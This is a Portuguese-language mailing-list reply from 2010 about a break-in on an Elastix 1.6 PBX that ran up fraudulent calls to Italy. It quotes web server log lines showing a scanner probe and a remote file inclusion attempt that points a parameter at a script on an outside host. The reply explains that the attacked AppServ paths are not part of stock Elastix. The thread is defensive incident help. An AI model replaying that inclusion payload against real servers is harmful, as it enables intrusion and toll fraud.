[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Alejandro Flores
alejandrorflores em gmail.com
Segunda Novembro 22 16:00:46 BRST 2010
Gleidison,
> Sidinei,
> Obrigado pela Resposta,
> cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes
> para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo.
> alguem poderia me ajudar a bloquear isso.
> /var/log/httpd/access_log
> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs
> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET
> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1"
> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Você instalou algo mais no seu elastix? Ele faz referência a pastas
que não existem no elastix 1.6 padrão, como /user/ e /appserv/ . Pelo
que pesquisei na NET esse appserv é um XAMP da vida. E no seu caso,
estava com falhas de segurança.
Nessa segunda linha do log ele se certifica de que o servidor está
'vulnerável' e depois disso você ta frito.
--
Abraço!
Alejandro Flores
http://www.triforsec.com.br/
Mais detalhes sobre a lista de discussão AsteriskBrasil